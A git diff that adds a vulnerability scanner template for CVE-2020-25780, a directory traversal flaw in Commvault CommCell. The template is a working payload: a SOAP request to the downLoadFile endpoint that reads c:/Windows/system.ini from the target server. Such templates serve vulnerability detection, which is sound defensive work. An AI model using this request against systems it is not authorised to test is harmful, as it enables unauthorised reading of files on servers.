diff --git a/cves/2020/CVE-2020-25780.yaml b/cves/2020/CVE-2020-25780.yaml
new file mode 100644
index 0000000000..6d3ee92af4
--- /dev/null
+++ b/cves/2020/CVE-2020-25780.yaml
@@ -0,0 +1,41 @@
+id: CVE-2020-25780
+
+info:
+  name: Commvault CommCell Directory Traversal
+  author: pdteam
+  severity: high
+  tags: cve,cve2020,commvault,lfi
+  description: In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead view a file outside of the log-files folder.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
+    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
+
+requests:
+  - method: POST
+    path:
+      - "http://{{Host}}:81/SearchSvc/CVSearchService.svc"
+
+    headers:
+      Cookie: Login
+      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
+      content-type: text/xml
+
+    body: |
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
+           <soapenv:Header/>
+           <soapenv:Body>
+              <tem:downLoadFile>
+                 <tem:path>c:/Windows/system.ini</tem:path>
+              </tem:downLoadFile>
+           </soapenv:Body>
+        </soapenv:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "downLoadFileResult"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file